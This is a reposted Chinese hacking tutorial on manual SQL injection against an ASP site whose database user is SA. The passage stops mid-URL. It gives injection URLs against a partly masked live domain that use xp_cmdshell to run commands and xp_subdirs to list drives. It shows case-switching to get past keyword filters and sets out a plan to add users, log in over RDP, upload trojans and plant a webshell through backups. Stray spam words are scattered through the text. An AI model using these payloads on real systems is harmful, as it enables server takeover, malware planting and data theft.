SQL注入中的错误分析及渗透技术.docxVIP

[转贴]SQL注入中的错误分析及渗透技术　【原创】SQL注入中的错误分析及渗透技术　, , 　简介:本文主要讲了在SQL注入过程中遇到一些特殊问题时的一些思考及处理思路,其中涉及了一些手工注入的语法及渗透思维,谨以此文献给那些刚刚起步的菜鸟朋友们,我也是刚刚起步,掌握了一些技术,希望将掌握的技术写 ...信息来自：　简介:本文主要讲了在SQL注入过程中遇到一些特殊问题时的一些思考及处理思路,其中涉及了一些手工注入的语法及渗透思维,谨以此文献给那些刚刚起步的菜鸟朋友们,我也是刚刚起步,掌握了一些技术,希望将掌握的技术写出来与大家共享、共同学习、共同提高。信息来自：　普遍的判断注入的方法相信大家都已经掌握了，无非就是加单引号，加and 1=1 and 1=2之类的。是的这个的确是判断注入的方法，但知道这些对于渗透入侵还是远远不够的。我今天引用的这个例子可以通过这种方法判断为存在注入漏洞，但是用工具却注入不了。我们今天将采用的是手工注入的方法，在注入过程中对随时遇到的错误信息进行分析及判断。黑客　例子： 网络安全　加单引号，返回错误　加and 1=1 返回正常　加and 1=2 返回错误　好了，先用工具注入一下，看结果。　如图1：　黑客　从中可以看出当前连接用户名、库名、权限是SA，比较大。我们在看一下是否可执行命令，打开NBSI的命令工具，列C盘看下，结果显示什么也没有，再列目录看下，结果还是一样，空空如也。黑客　如图2：　黑客　到这里可能绝大多数初学的朋友就要被难住了，难道真的没有办法了吗？有的！！当然有，因为这个注入点过滤了一些关键字，所以用工具就无能为力了，不过转换一下这些关键字的大小写即可成功注入，下面说说手工注入该站的详细步骤。黑客　入侵思路：既然注入点权限是SA，那么首先考虑的就是执行命令，加用户，3389登录，如果没有3389开放的话，那就试试用命令执行一些上传操作，例如：HTTP上传、FTP上传、TFTP上传等等。上传一些木马程序然后运行。如果不可以执行命令，那么还可以查查WEB主目录，利用差异备份或者LOG备份得到一个WEBSHELL，然后再恢复命令执行，上传木马并运行。黑客　以上面这个注入点为例，首先怎样判断注入点是否可执行命令。大家都知道工具注入是不行的了，那么手工该如何判断这个注入点是否能执行命令呢?我们可以先建一个表，然后执行一下XP_CMDSHELL存储过程在C盘上建个目录,再用xp_subdirs存储过程读C盘下的子目录进表中,再利用暴表的注入语句将表内容读出,这样我们就知道目录是否创建成功,如果成功说明可执行命令。注入语句如下:信息来自：　(1)http://www.*****.com/zhuanti/zt.asp?id=34;Create table temp(id nvarchAr(255),num1 nvarchAr(255),num2 nvarchAr(255),num3 nvarchAr(255));--黑客　(2)http://www.*****.com/zhuanti/zt.asp?id=34;eXec master.dbo.xp_cmDshell md c:cxd--黑客　(3)http://www.*****.com/zhuanti/zt.asp?id=34;Insert into temp(id) eXec master.dbo.xp_subdirs c:;--　(4)http://www.*****.com/zhuanti/zt.asp?id=34 and (Select top 1 id from temp)0--网络安全　(5)http://www.*****.com/zhuanti/zt.asp?id=34 and (Select id from (Select top 1 * from (Select top 2 * from temp order by 1) T order by 1 desc)S)0--网络安全　(6)http://www.*****.com/zhuanti/zt.asp?id=34 and (Select id from (Select top 1 * from (Select top x * from temp order by 1) T order by 1 desc)S)0--　可是在执行第一条语句是出现了错误,一般正常的注入点执行这个建表命令是不会出错的,但是这个注入点出错了,如图3:黑客　　网络安全　提示信息为:数据库中已存在名为temp的对象.　疑问1:难道是这个库中以前就有temp表,那好吧,我们先把以前的表删除.语句如下:　http://www.*****.com/zhuanti/zt.asp?id=34;Drophttp://ww